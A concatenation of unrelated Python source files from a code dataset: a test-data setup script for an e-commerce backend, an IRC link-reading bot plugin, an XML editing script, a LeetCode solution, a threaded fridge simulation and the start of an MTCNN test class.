\"\"\"\n self.redGift_value=10\n self.redGift_quantity=5\n self.redGift_ownLimit=5\n self.redGift_useBaseLine=40\n self.redGift_instruction=u'满40减10'\n \"\"\"\n product_price:上架产品的价格\n procuct_limit:上架产品的数量\n \"\"\"\n self.product_price=50\n self.procuct_limit=100\n \"\"\"\n conn_test:初始化链接测试环境数据库\n conn_local:初始化链接本地数据库\n \"\"\"\n self.conn_test = 
MySQLdb.connect(host=self.test_db_ip, user=self.test_user, passwd=self.test_passwd, port=3306,charset=\"utf8\")\n self.conn_local = MySQLdb.connect(host=self.local_ip, user=self.local_user, passwd=self.local_passwd, port=3306, charset=\"utf8\")\n\n \"\"\"\n session:初始化session节点\n \"\"\"\n self.session=requests.Session()\n \"\"\"\n 初始化log格式\n \"\"\"\n logging.basicConfig(\n level=logging.DEBUG,\n format='[%(asctime)s] [%(levelname)s] %(message)s',\n datefmt='%Y_%m_%d %H:%M:%S',\n )\n @classmethod\n def changeIntoStr(cls,data,str_data=''):\n if isinstance(data, unicode):\n str_data = data.encode('utf-8')\n elif isinstance(data, str):\n str_data = data\n return str_data\n\n @classmethod\n def returnMd5(cls,pwd):\n md = hashlib.md5()\n md.update(pwd)\n return md.hexdigest()\n\n @staticmethod\n def createTime():\n \"\"\"\n :return: 返回发放开始时间,发放结束时间,可使用开始时间,可使用结束时间\n \"\"\"\n grantStart = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()- 1* 60 * 60))\n useStart = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()- 2* 60 * 60))\n useEnd = grantEnd = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time() + 24 * 60 * 60))\n return grantStart, grantEnd, useStart, useEnd\n\n @staticmethod\n def createName():\n \"\"\"\n :return:返回自动创建名字\n \"\"\"\n couponName = u'自动测' + str(int(time.time()))\n return couponName\n\n def newCoupon(self):\n \"\"\"\n 创建优惠码\n :return:\n \"\"\"\n couponName=self.createName()\n grantStart,grantEnd,useStart,useEnd=self.createTime()\n #登陆后台\n login_url='{0}/users/login'.format(self.server_url)\n login_data={'userName':self.url_username,'password':self.url_password}\n login_response=self.session.post(url=login_url,data=login_data,headers=self.headers)\n #选择城市\n changzhou_url='{0}/users/updateAgency'.format(self.server_url)\n changzhou_data={'cityId':self.cityId,'agencyId':3}\n chanzhou_response=self.session.post(url=changzhou_url,data=changzhou_data,headers=self.headers)\n #创建单\n youhuiquan_url='{0}/json/management/coupon/addCoupon'.format(self.server_url)\n \"\"\"\n type:2, 优惠码\n grantType:-1 无兑换条件\n lifeTime:-1 无领取时间限制\n \"\"\"\n youhuiquan_data={'couponName':couponName,'type':2,'grantType':'-1','value':self.coupon_value,'grantStart':grantStart,\n 'grantEnd':grantEnd,'useStart':useStart,'useEnd':useEnd,\n 'lifeTime':'-1','quantity':self.coupon_quantity,'useBaseLine':self.coupon_useBaseLine,'instruction':self.coupon_instruction}\n youhuiquan_response=self.session.post(youhuiquan_url,data=youhuiquan_data,headers=self.headers)\n youhuiquan_strdata = self.changeIntoStr(youhuiquan_response.text)\n youhuiquan_json=json.loads(youhuiquan_strdata)\n #点击导出\n daochu_url='{0}/json/management/coupon/queryCoupon?id={1}'.format(self.server_url,str(youhuiquan_json['gift']['id']))\n daochu_response=self.session.get(url=daochu_url,headers=self.headers)\n daochu_data=self.changeIntoStr(daochu_response.text)\n testdata=json.loads(daochu_data)\n #拼接下载url地址\n test_url = '{7}/json/management/coupon/code/generate?couponCodeBaseSettingId={0}' \\\n '&name={1}&useStart={2}&useEnd={3}&quantity={4}&value={5}&useBaseLine={6}'.format( testdata['data']['id'],\n urllib2.quote(testdata['data']['couponName'].encode('utf-8')),\n testdata['data']['useStartTime'],\n testdata['data']['useEndTime'],\n testdata['data']['grantCount'],\n testdata['data']['value'],\n testdata['data']['useBaseLine'],\n self.server_url)\n self.session.get(url=test_url,headers=self.headers)\n return youhuiquan_json['gift']['id'],youhuiquan_data['couponName']\n\n def connectTestMysql(self):\n \"\"\"\n 
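Connect to the test-environment MySQL database and read back the coupon codes generated for the new coupon.\n        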
链接测试环境数据库\n :returns:返回优惠码信息,giftID,couponName\n \"\"\"\n giftID,couponName=self.newCoupon()\n cur = self.conn_test.cursor()\n self.conn_test.select_db(self.test_mainDb)\n count = cur.execute('select code from coupon_codes WHERE CouponCodeBaseSettingId = {0}'.format(giftID))\n info = cur.fetchmany(count)\n self.conn_test.commit()\n cur.close()\n return info,giftID,couponName\n\n def createCouponTabel(self):\n \"\"\"\n 本地数据库 创建Coupon表\n \"\"\"\n getData,_id,name=self.connectTestMysql()\n cur = self.conn_local.cursor()\n self.conn_local.select_db('dianda_test')\n cur.execute('create table if not exists Coupon(id int ,couponName varchar(20),coupon_id int(10),coupon_code VARCHAR(20),PRIMARY KEY(id))')\n cur.execute('delete from Coupon')\n for data in getData:\n logging.info(str(data[0]))\n cur.execute(\"insert into Coupon(id,couponName,coupon_id,coupon_code)values('%d','%s','%d','%s')\" % (getData.index(data), name, _id, data[0]))\n self.conn_local.commit()\n cur.close()\n\n def createNewRedGift(self):\n \"\"\"\n 创建红包\n :return:\n \"\"\"\n name = self.createName()\n grantStart, grantEnd, useStart, useEnd = self.createTime()\n #登录\n login_url = '{0}/users/login'.format(self.server_url)\n login_data = {'userName':self.url_username,'password':self.url_password}\n login_response = self.session.post(url=login_url, data=login_data, headers=self.headers)\n #切换城市\n changzhou_url = '{0}/users/updateAgency'.format(self.server_url)\n changzhou_data = {'cityId': self.cityId, 'agencyId': 3}\n chanzhou_response = self.session.post(url=changzhou_url, data=changzhou_data, headers=self.headers)\n #新增红包\n redgift_url = '{0}/json/management/promotional/coupon/redgift/add'.format(self.server_url)\n \"\"\"\n ownLimit:用户拥有限制数量\n vipRank:vip无限制\n lifeTime:使用周期不限制\n \"\"\"\n redgift_data = {'name': name, 'type': u'普通红包', 'value': self.redGift_value, 'grantStart': grantStart,\n 'grantEnd': grantEnd, 'useStart': useStart, 'useEnd': useEnd,'lifeTime':-1,\n 'quantity': self.redGift_quantity, 'ownLimit': self.redGift_ownLimit, 'useBaseLine': self.redGift_useBaseLine,\n 'vipRank': '-1','instruction': self.redGift_instruction}\n redgift_response = self.session.post(redgift_url, data=redgift_data, headers=self.headers)\n redgift_str=self.changeIntoStr(redgift_response.text)\n redgift_json = json.loads(redgift_str)\n logging.info(str(redgift_json))\n return redgift_json\n\n def searchTestStoreUser(self):\n \"\"\"\n 搜索测试环境数据库stores账户信息\n \"\"\"\n pwd_MD5=self.returnMd5(self.device_login)\n cur = self.conn_test.cursor()\n self.conn_test.select_db(self.test_mainDb)\n count=cur.execute('select id,storeUser,storePwd,storeName,storePhoneNum,storeState,dadou,CityId,isFirstLogin from stores WHERE storeState= 1 AND CityId = {0} AND storePwd = \"{1}\" AND LENGTH(storePhoneNum)=11 '.format(self.cityId, pwd_MD5))\n info = cur.fetchmany(count)\n self.conn_test.commit()\n cur.close()\n return info[3]\n\n def createLoginDeviceTabel(self):\n \"\"\"\n 本地数据库 创建logindevice表\n \"\"\"\n _id, storeUser, storePwd, storeName, storePhoneNum, storeState, dadou, CityId, isFirstLogin = self.searchTestStoreUser()\n cur = self.conn_local.cursor()\n self.conn_local.select_db(self.local_mainDb)\n cur.execute('create table if not exists logindevice(id int ,storeUser varchar(20),storePwd varchar(50),storeName varchar(20),storePhoneNum varchar(15),storeState varchar(5),dadou varchar(10),CityId VARCHAR(10),isFirstLogin VARCHAR(5),PRIMARY KEY(id))')\n cur.execute(\"delete from logindevice\")\n cur.execute(\"insert into 
logindevice(id,storeUser,storePwd,storeName,storePhoneNum,storeState,dadou,CityId,isFirstLogin)values('%d','%s','%s','%s','%s','%s','%s','%s','%s')\" % (_id, storeUser, storePwd, storeName, storePhoneNum, storeState, dadou, CityId, isFirstLogin))\n logging.info(str(_id))\n self.conn_local.commit()\n cur.close()\n\n def UpdateTestUserDadou(self):\n \"\"\"\n 更新账号达豆数量,默认改为2000\n \"\"\"\n testID=self.getLocalLoginDeviceID()\n cur = self.conn_test.cursor()\n self.conn_test.select_db('ctcdb_new_test')\n cur.execute(\"update stores set dadou={0} where id = {1}\".format(self.dadouCount, testID[0]))\n # cur.execute('select dadou from stores WHERE id= {0}'.format(testID[0]))\n # info = cur.fetchone()\n # print info\n self.conn_test.commit()\n cur.close()\n\n def getLocalLoginDeviceID(self):\n \"\"\"\n 获取当前账号id\n :return: info\n \"\"\"\n cur = self.conn_local.cursor()\n self.conn_local.select_db(self.local_mainDb)\n cur.execute('select id from logindevice')\n info = cur.fetchone()\n self.conn_local.commit()\n cur.close()\n return info\n\n def clean_redis(self):\n \"\"\"\n 清空缓存购物车信息\n \"\"\"\n rd = redis.Redis(host=self.redis_db_ip, port=self.redis_port, db=self.redis_db)\n testID = self.getLocalLoginDeviceID()\n key_ = 'cart:{0}'.format(testID[0])\n if rd.exists(key_):\n rd.delete(key_)\n\n def newProduct(self):\n \"\"\"\n 新建上架商品\n \"\"\"\n publish_Name = self.createName()\n publish_time = self.createTime()\n #登录\n login_url = '{0}/users/login'.format(self.server_url)\n login_data = {'userName':self.url_username,'password':self.url_password}\n login_response = self.session.post(url=login_url, data=login_data, headers=self.headers)\n #选择常州\n changzhou_url = '{0}/users/updateAgency'.format(self.server_url)\n changzhou_data = {'cityId': self.cityId, 'agencyId': 3}\n chanzhou_response = self.session.post(url=changzhou_url, data=changzhou_data, headers=self.headers)\n # 排序单\n \"\"\"\n 'order[0][dir]': 'desc' 按可用库存排序\n \"\"\"\n kucun_url = '{0}/api/goods/stock/list'.format(self.server_url)\n kucun_data = {'draw': 2, 'order[0][dir]': 'desc'}\n kucun_response = self.session.post(url=kucun_url, data=kucun_data, headers=self.headers)\n kucun_str = self.changeIntoStr(kucun_response.text)\n kucun_json = json.loads(kucun_str)\n product_id = []\n for q in kucun_json['data']:\n if q['qoa'] > 1000:\n product_id.append(q['id'])\n if product_id:\n good_id = product_id[0]\n #上架操作\n publish_url = '{0}/api/goods/shelve/publish'.format(self.server_url)\n \"\"\"\n catalogId:商品分类\n areaPriceStr:价格定位\n \"\"\"\n publish_data = {'isDirectSell': '0', 'combos[0][isFree]': '0', 'comboType': '0', 'catalogId': '3010000','vip': '0', 'yjPrice': '0', 'id': good_id,\n 'isHotFirst': '0', 'title': publish_Name, 'specification': '1','combos[0][id]': good_id,'type': '0', 'combos[0][originalPrice]': '0',\n 'onSale': '0', 'dadou': '0','price': self.product_price, 'isAllFirst': '0','startTime': publish_time[0], 'isOrderLimit': 'unlimited', 'isTypeFirst': '0',\n 'endTime': publish_time[1], 'combos[0][packageNum]': '1','amount': '1', 'limit': self.procuct_limit, 'isDiscount': '1',\n 'areaPriceStr': '101:{0}#103:{1}#111:{2}#115:{3}#141:{4}#142:{5}#147:{6}#151:{7}#152:{8}#155:{9}#160:{10}#'.format(self.product_price,self.product_price,self.product_price,\n self.product_price,self.product_price,self.product_price,\n self.product_price,self.product_price,self.product_price,\n self.product_price,self.product_price),\n 'combos[0][unit]': '1', 'notSoldPriceArea': '[]', 'combos[0][price]': '0'}\n publish_response = self.session.post(url=publish_url, 
data=publish_data, headers=self.headers)\n publish_str = self.changeIntoStr(publish_response.text)\n publish_json = json.loads(publish_str)\n if publish_json['status'] == 1:\n search_id_url = '{0}/json/goods/shelve/list'.format(self.server_url)\n search_id_data = {'name': publish_Name}\n search_id_response = self.session.post(url=search_id_url, data=search_id_data, headers=self.headers)\n search_id_str = self.changeIntoStr(search_id_response.text)\n search_id_json = json.loads(search_id_str)\n if search_id_json['recordsTotal'] == 1:\n on_sell_data = [search_id_json['data'][0]['id'], search_id_json['data'][0]['name'], self.product_price, self.procuct_limit,good_id, self.cityId]\n return on_sell_data\n\n def createProductTable(self):\n \"\"\"\n 本地数据库 创建productcz表\n \"\"\"\n CZ_data=self.newProduct()\n if CZ_data:\n cur = self.conn_local.cursor()\n self.conn_local.select_db(self.local_mainDb)\n cur.execute('create table if not exists productcz(id int ,name varchar(50),price VARCHAR(10),`limit` int(10),GoodId int(10),CityId int(10), PRIMARY KEY(id))')\n cur.execute('delete from productcz')\n cur.execute(\"insert into productcz(id,name,price,`limit`,GoodId,CityId)values('%d','%s','%s','%d','%d','%d')\" % (CZ_data[0], CZ_data[1], CZ_data[2], CZ_data[3], CZ_data[4], CZ_data[5]))\n logging.info(str(CZ_data[0]))\n self.conn_local.commit()\n cur.close()\n\n def mainrun(self):\n \"\"\"\n 主函数运行\n \"\"\"\n preConditionForTest().createCouponTabel()\n preConditionForTest().createNewRedGift()\n preConditionForTest().createLoginDeviceTabel()\n preConditionForTest().UpdateTestUserDadou()\n preConditionForTest().createProductTable()\n preConditionForTest().clean_redis()\nif __name__==\"__main__\":\n preConditionForTest().mainrun()","sub_path":"ant/mainrun_cz.py","file_name":"mainrun_cz.py","file_ext":"py","file_size_in_byte":19187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"97406996","text":"from base import BotPlugin\nfrom tweepy import OAuthHandler, API as TWITTER_API\nfrom settings import TWITTER as T\nfrom response import random_response\nfrom urllib2 import urlopen\nimport re\nimport json\nimport requests\nimport lxml.html\nimport regex\n\nTWITTER_OAUTH = OAuthHandler(T['consumer_key'], T['consumer_secret'])\nTWITTER_OAUTH.set_access_token(T['access_token_key'], T['access_token_secret'])\nTWITTER = TWITTER_API(TWITTER_OAUTH)\n\n# These will be filtered out in _read_websites\n__all_non_web__ = [regex.TWITTER, regex.YOUTUBE, regex.VIMEO]\n\nVIDEO_RESPONSES = [\n \"That video is titled '%(title)s'. \"\n + \"You will waste %(seconds)ss of your life watching it. \",\n \"The title of that %(service)s video is '%(title)s'. \"\n + \"It has been viewed %(views)s times. \",\n \"Title: '%(title)s', Views: %(views)s, duration: %(seconds)ss.\",\n \"Title of that %(service)s video is '%(title)s'.\",\n \"%(service)s video is titled '%(title)s' and has %(rating)s.\",\n \"Here is the title of that %(service)s video: '%(title)s'.\",\n \"I found the title of that %(service)s video, here it is: '%(title)s'\",\n \"If you click that link you will watch a video titled '%(title)s'. 
\"\n + \"Good luck!\",\n]\n\nWEB_RESPONSES = [\n \"The title of that page is '%(title)s'\",\n \"That page might be about %(title)s\",\n \"That page has an interesting title: '%(title)s'\",\n \"The title of that page makes me want to read the whole thing '%(title)s'\",\n \"%(title)s\",\n]\n\n\nclass ReadLinks(BotPlugin):\n\n @staticmethod\n def _get_tweet_info(status_id):\n status = TWITTER.get_status(status_id)\n name = status.user.screen_name\n text = status.text.replace('\\n', ' ')\n return name, text\n\n def _read_twitter(self, channel, msg):\n twt_res = regex.TWITTER.search(msg)\n if not twt_res:\n return\n try:\n (name, text) = self._get_tweet_info(twt_res.group('id'))\n response = unicode(\"@\" + name + \" on Twitter says: \" + text)\n response = response.encode('utf8')\n self.bot.say(response, channel)\n except Exception:\n self.bot.log_error('Could not get tweet from: \"' + msg + '\"')\n self.bot.say('Sorry, I wasn\\'t able to read the last tweet :(',\n channel)\n\n @staticmethod\n def _get_vimeo_info(video_id):\n api_url = \"https://vimeo.com/api/v2/video/\" + video_id + \".json\"\n r = requests.get(api_url)\n video = json.loads(r.text)[0]\n if \"stats_number_of_likes\" in video:\n likes = (\"%d likes.\" % video[\"stats_number_of_likes\"])\n else:\n likes = \"an unknown number of likes\"\n return {\n 'service': \"vimeo\",\n 'title': video[\"title\"].encode('utf8'),\n 'seconds': str(video[\"duration\"]),\n 'views': str(video[\"stats_number_of_plays\"]),\n 'rating': likes,\n }\n\n def _read_vimeo(self, channel, msg):\n vimeo_res = regex.VIMEO.search(msg)\n if not vimeo_res:\n return\n try:\n video_info = self._get_vimeo_info(vimeo_res.group('id'))\n self.bot.say(random_response(VIDEO_RESPONSES) % video_info,\n channel)\n except Exception:\n self.bot.log_error('Could not get title of vimeo link from: \"'\n + msg + '\"')\n self.bot.say('For some reason I couldn\\'t read the title of that '\n + 'vimeo link.', channel)\n\n @staticmethod\n def _get_youtube_info(video_id):\n import pafy\n url = \"https://www.youtube.com/watch?v={0}\".format(video_id)\n video = pafy.new(url)\n\n if video.rating is not None:\n average_rating = float(video.rating)\n rating = (\"an average rating of %.2f\" % average_rating)\n else:\n rating = \"no rating\"\n return {\n 'service': \"youtube\",\n 'title': video.title.encode('utf-8'),\n 'seconds': video.length,\n 'views': video.viewcount,\n 'rating': rating,\n }\n\n def _read_youtube(self, channel, msg):\n yt_res = regex.YOUTUBE.search(msg)\n if not yt_res:\n return\n try:\n video_info = self._get_youtube_info(yt_res.group('id'))\n self.bot.say(random_response(VIDEO_RESPONSES) % video_info,\n channel)\n except Exception:\n self.bot.log_error('Could not get title of youtube link from: \"'\n + msg + '\"')\n self.bot.say('For some reason I couldn\\'t read the title of that '\n + 'youtube link.', channel)\n\n def _read_websites(self, channel, msg):\n links = regex.WEB_URL.findall(msg)\n for link in links:\n if [r for r in __all_non_web__ if r.search(link)]:\n continue\n try:\n t = lxml.html.parse(urlopen(link)) # noqa: E501 # nosec: regex.WEB_URL only allows http(s)\n t = t.find(\".//title\").text\n t = t.strip().replace('\\n', ' ')\n if len(re.sub(\"[^a-zA-Z0-9]\", \"\", t)) >= 5:\n self.bot.say(random_response(WEB_RESPONSES) % {'title': t},\n channel)\n except Exception:\n self.bot.log_error('Could not get title of webpage: \"'\n + msg + '\"')\n\n def handle_message(self, channel, nick, msg, line=None):\n if \"PRIVMSG\" in line:\n self._read_twitter(channel, 
msg)\n self._read_youtube(channel, msg)\n self._read_vimeo(channel, msg)\n self._read_websites(channel, msg)\n","sub_path":"src/plugins/read_links.py","file_name":"read_links.py","file_ext":"py","file_size_in_byte":5716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"624592136","text":"# coding:utf-8\n\n# from xml.etree.ElementTree import ElementTree,Element\nfrom xml.etree import ElementTree as ET\n#\n#\n#\n# def read_xml(in_path):\n# \"\"\"\n# 读取并解析xml文件\n# :param in_path:xml路径\n# :return:ElementTree\n# \"\"\"\n# tree = ElementTree()\n# tree.parse(in_path)\n# return tree\n#\n#\n# def write_xml(tree,out_path):\n# \"\"\"\n# 将xml文件写出\n# :param tree: xml树\n# :param out_path: 写出路径\n# :return:\n# \"\"\"\n# tree.write(out_path,encoding=\"utf-8\", xml_declaration=True)\n#\n# def find_nodes(tree,path):\n# \"\"\"\n# 查找某个路径匹配的所有节点\n# :param tree: xml树\n# :param path: 节点路径\n# :return:\n# \"\"\"\n# return tree.findall(path)\n#\n# def change_node_text(nodelist,text,is_add=False,is_delete=False):\n# \"\"\"\n# 改变增加删除一个节点的文本\n# :param nodelist: 节点列表\n# :param text: 更新后的文本\n# :param is_add:\n# :param is_delete:\n# :return:\n# \"\"\"\n# for node in nodelist:\n# if is_add:\n# node.text += text\n# elif is_delete:\n# node.text = \"\"\n# else:\n# node.text = text\n#\n# def get_node_by_keyvalue(nodelist, kv_map):\n# \"\"\"\n# 根据属性及属性值定位符合的节点,返回节点\n# nodelist: 节点列表\n# kv_map: 匹配属性及属性值map\n# \"\"\"\n# result_nodes = []\n# for node in nodelist:\n# if if_match(node, kv_map):\n# result_nodes.append(node)\n# return result_nodes\n#\n# def if_match(node, kv_map):\n# '''判断某个节点是否包含所有传入参数属性\n# node: 节点\n# kv_map: 属性及属性值组成的map\n# '''\n# for key in kv_map:\n# if node.get(key) != kv_map.get(key):\n# return False\n# return True\n# ET.register_namespace(\"\", \"http://schemas.datacontract.org/2004/07/Xasd.FASC.SECM.Entity\")\nET.register_namespace(prefix=\"i\", uri=\"http://www.w3.org/2001/XMLSchema-instance\")\ntree = ET.parse(r\"C:\\Users\\Administrator\\Desktop\\lkxx.xml\")\nroot = tree.getroot()\n\nlk_id = root[3][0]\nfor i in lk_id:\n print(i.text)\nprint(root[3][0][15].text)\nlk_id_ele = root[3][0][15]\nlk_id_ele.text = \"0001\"\n\ntree.write(file_or_filename=\"lkxx.xml\",\n encoding=\"utf-8\",\n #default_namespace=\"http://schemas.datacontract.org/2004/07/Xasd.FASC. 
SECM.Entity\",\n xml_declaration=True)\n\nwith open(\"lkxx.xml\",\"rb\") as fp:\n data = fp.read().decode(\"utf-8\")\n print(data)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Airport/消息队列/rwXML.py","file_name":"rwXML.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"107242383","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# time: 2018/1/29 15:44\n\nclass Solution(object):\n def intersection(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: List[int]\n \"\"\"\n ret = []\n m1 = {}\n for a in nums1:\n if a not in m1:\n m1[a] = 1\n else:\n m1[a] += 1\n\n for b in nums2:\n if b in m1 and m1[b] > 0:\n m1[b] -= 1\n ret.append(b)\n return ret\n\n\nprint(Solution().intersection([1, 2, 2, 1], [2, 2]))\n","sub_path":"python/a350.py","file_name":"a350.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"270255221","text":"import random\nimport logging\nimport threading\nimport time\n\nlogging.basicConfig(\n format='%(asctime)s.%(msecs)03d [%(threadName)s] - %(message)s', datefmt='%H:%M:%S', level=logging.INFO)\n\n\ncantidadMaximaLatas = 5\ncantidadMaximaBotellas = 5\n# CUANDO SE ENTREGA LA MERCADERIA POR EL PROVEEDOR SE GUARDA EN LA DESPENSA\nlatasEnDespensa = []\nbotellasEnDespensa = []\ncantHeladeras = 5\ncantProveedores = 20\ncantBebedores = 3\nlistaHeladeras = []\n# SEMAFORO PARA CARGA DE HELADERA\nsemaforocargaHeladera = threading.Semaphore(1)\nsemaforoProveedor = threading.Semaphore(1)\n# VARIABLE PARA SABER CUAL ES LA HELADERA MAS VACIA\nHeladeraMasVacia = 25\nHeladerasLlenadas = False\n\n\nclass Lata():\n def __init__(self, estado=\"Bien\"):\n super().__init__()\n self.estado = estado\n\n\nclass Botella():\n def __init__(self, estado=\"Bien\"):\n super().__init__()\n self.estado = estado\n\n\nclass Heladera(threading.Thread):\n def __init__(self, numeroHeladera):\n super().__init__()\n self.numeroHeladera = numeroHeladera\n self.Botellas = []\n self.Latas = []\n # AGREGO LA CANTIDAD DE FALTANTES QUE TIENE LA HELADERA\n self.Faltantes = cantidadMaximaBotellas + cantidadMaximaLatas\n self.primeraCarga = False\n\n def agregarBotella(self):\n # AGREGO LA BOTELLA A LA HELADERA Y SACO UNA DE LA DESPENSA\n self.Botellas.append(botellasEnDespensa.pop())\n\n def agregarLata(self):\n # AGREGO LA BOTELLA A LA HELADERA Y SACO UNA DE LA DESPENSA\n self.Latas.append(latasEnDespensa.pop())\n\n def run(self):\n logging.info(\n f'Enchufo la heladera {self.numeroHeladera} y comienzo a llenarla')\n while True:\n\n # CONSULTO SI ES LA MAS VACIA\n if (self.numeroHeladera == HeladeraMasVacia or self.primeraCarga == False):\n\n # CONSULTO SI FALTA LLENAR BOTELLAS Y SI TENGO DISPONIBLE\n if len(self.Botellas) < cantidadMaximaBotellas and len(botellasEnDespensa) > 0:\n self.agregarBotella()\n if len(self.Latas) < cantidadMaximaLatas and len(latasEnDespensa) > 0:\n self.agregarLata()\n # UNA VEZ ESTA LLENA LA HELADERA SUELTO EL SEMAFORO PARA QUE LO PUEDA TOMAR LA SIGUIENTE\n if len(self.Botellas) == cantidadMaximaBotellas and len(self.Latas) == cantidadMaximaLatas:\n if(self.primeraCarga == False):\n logging.info(\n f'Termine de llenar la Heladera {self.numeroHeladera} y presiono el botón de enfriado rápido')\n self.primeraCarga = True\n else:\n logging.info(\n f'Se relleno la Heladera {self.numeroHeladera}')\n semaforocargaHeladera.release()\n 
time.sleep(10)\n\n\nclass Despensa(threading.Thread):\n def __init__(self, cantHeladeras):\n super().__init__()\n self.cantidadHeladeras = cantHeladeras\n\n def comprarHeladeras(self):\n for i in range(self.cantidadHeladeras):\n listaHeladeras.append(Heladera(i))\n\n def llenarHeladera(self):\n for i in range(self.cantidadHeladeras):\n semaforocargaHeladera.acquire()\n listaHeladeras[i].start()\n HeladerasLlenadas = True\n\n def rellenarHeladera(self):\n semaforocargaHeladera.acquire()\n cantidadFaltante = 0\n global HeladeraMasVacia\n masVaciaAnterior = HeladeraMasVacia\n while HeladeraMasVacia == masVaciaAnterior:\n\n for i in range(self.cantidadHeladeras):\n if ((cantidadMaximaLatas + cantidadMaximaBotellas) - (len(listaHeladeras[i].Botellas) + len(listaHeladeras[i].Latas))) > cantidadFaltante:\n HeladeraMasVacia = i\n logging.info(\n f'La Heladera {HeladeraMasVacia} es la que mas faltantes tiene')\n semaforocargaHeladera.release()\n\n def run(self):\n self.comprarHeladeras()\n self.llenarHeladera()\n while True:\n self.rellenarHeladera()\n\n\nclass Proveedor(threading.Thread):\n def __init__(self, numero):\n super().__init__()\n self.numero = numero\n self.latasAEntregar = random.randint(1, 5)\n self.botellasAEntregar = random.randint(1, 5)\n\n def decargarLatas(self):\n logging.info(\n f'Proveeror {self.numero}: Le entrego {self.latasAEntregar} latas')\n for i in range(self.latasAEntregar):\n latasEnDespensa.append(Lata())\n\n def descargarBotellas(self):\n logging.info(\n f'Proveeror {self.numero}: Le entrego {self.botellasAEntregar} botellas')\n for i in range(self.latasAEntregar):\n botellasEnDespensa.append(Botella())\n\n def run(self):\n semaforoProveedor.acquire()\n self.decargarLatas()\n self.descargarBotellas()\n semaforoProveedor.release()\n\n# MODIFICACION PARA BONUS\n\n\nclass Bebedor(threading.Thread):\n def __init__(self, numero, cantMaxLatas, cantMaxBotellas):\n super().__init__()\n self.numero = numero\n self.cantMaximaLatas = cantMaxLatas\n self.cantMaximaBotellas = cantMaxBotellas\n # MEDIANTE RAMDOM LE ASIGNO UNA HELADERA DONDE BEBERÁ\n self.heladeraElegida = random.randint(0, cantHeladeras - 1)\n logging.info(\n f'Bebedor {self.numero}: Hola, me voy a tomar {self.cantMaximaLatas} latas y {self.cantMaximaBotellas} botellas de la heladera {self.heladeraElegida}')\n\n def tomarLata(self):\n logging.info(\n f'Bebedor {self.numero}: Me tomo una lata de cerveza')\n listaHeladeras[self.heladeraElegida].Latas.pop()\n self.cantMaximaLatas -= 1\n time.sleep(3)\n\n def tomarBotella(self):\n logging.info(\n f'Bebedor {self.numero}: Me tomo una botella de cerveza')\n listaHeladeras[self.heladeraElegida].Botellas.pop()\n self.cantMaximaBotellas -= 1\n time.sleep(3)\n\n def run(self):\n semaforoProveedor.acquire()\n while self.cantMaximaBotellas > 0 or self.cantMaximaLatas > 0:\n\n if len(listaHeladeras[self.heladeraElegida].Latas) > 0 and self.cantMaximaLatas > 0:\n self.tomarLata()\n if len(listaHeladeras[self.heladeraElegida].Botellas) > 0 and self.cantMaximaBotellas > 0:\n self.tomarBotella()\n logging.info(\n f'Bebedor {self.numero}: Me tome todo, creo que me voy a desmayar!!!')\n semaforoProveedor.release()\n\n# CLASE CONTROLADOR DE HELADERAS: CADA TANTO TIEMPO EL INSPECTOR REVISA LAS HELADERAS PARA VER SINO HAY LATAS PINCHADAS\n\n\nclass Inspector(threading.Thread):\n def __init__(self):\n super().__init__()\n\n def run(self):\n # REVISO TODAS LAS HELADERAS PARA VER SI EXISTE ALGUNA LATA PINCHADA\n while True:\n for i in range(cantHeladeras-1):\n\n for j in 
range(len(listaHeladeras[i].Latas) - 1, -1, -1): # reverse order keeps pop(j) index-safe and also checks the last can\n                    if listaHeladeras[i].Latas[j].estado != \"Bien\":\n                        listaHeladeras[i].Latas.pop(j)\n                        logging.info(\n                            f'Inspector: Encontre la lata {j} pinchada en la Heladera {i}!!!')\n            time.sleep(10)\n\n\nDespensa(cantHeladeras).start()\n\nfor i in range(cantProveedores):\n    Proveedor(i).start()\n\n\nfor i in range(cantBebedores):\n    # RANDOM PARA VER QUE TIPO DE BEBEDOR ES\n    # SI ES 1 SOLO BEBE LATAS, 2 SOLO BOTELLAS Y 3 AMBAS\n    tipo = random.randint(1, 3)\n    if tipo == 1:\n        cantbotellas = 0\n        cantidadLatas = random.randint(1, 5)\n        Bebedor(i, cantidadLatas, cantbotellas).start() # (latas, botellas): the argument order Bebedor's signature expects\n    elif tipo == 2:\n        cantbotellas = random.randint(1, 3)\n        cantidadLatas = 0\n        Bebedor(i, cantidadLatas, cantbotellas).start()\n    else:\n        cantbotellas = random.randint(1, 3)\n        cantidadLatas = random.randint(1, 5)\n        Bebedor(i, cantidadLatas, cantbotellas).start()\n\n\nInspector().start()\n\nwhile True:\n\n    # SOLO SE PUEDE PINCHAR CUANDO TODAS LAS HELADERAS ESTEN LLENAS\n    if HeladerasLlenadas == True:\n\n        # SIMULAR EL PINCHADO DE LATAS\n        heladeraAleatoria = random.randint(0, cantHeladeras - 1)\n        lataAleatoria = random.randint(0, cantidadMaximaLatas - 1)\n        listaHeladeras[heladeraAleatoria].Latas[lataAleatoria].estado = \"Pinchada\"\n        logging.info(\n            f' Se ha pinchado la lata {lataAleatoria} en la Heladera {heladeraAleatoria}!!!')\n        time.sleep(15)\n","sub_path":"Python-TP-Bonus-3.py","file_name":"Python-TP-Bonus-3.py","file_ext":"py","file_size_in_byte":8496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"370823342","text":"# -*-coding:utf-8-*-\nimport os\nimport cv2\nimport net\nimport torch\nimport utils\nimport datetime\nimport numpy as np \nimport PIL.Image as Image\nimport torchvision.transforms as tf\n\n\nclass Test:\n    \"\"\"pyramid\n    p: p_net\n    r: r_net\n    o: o_net\"\"\"\n    def __init__(self, test_img):\n        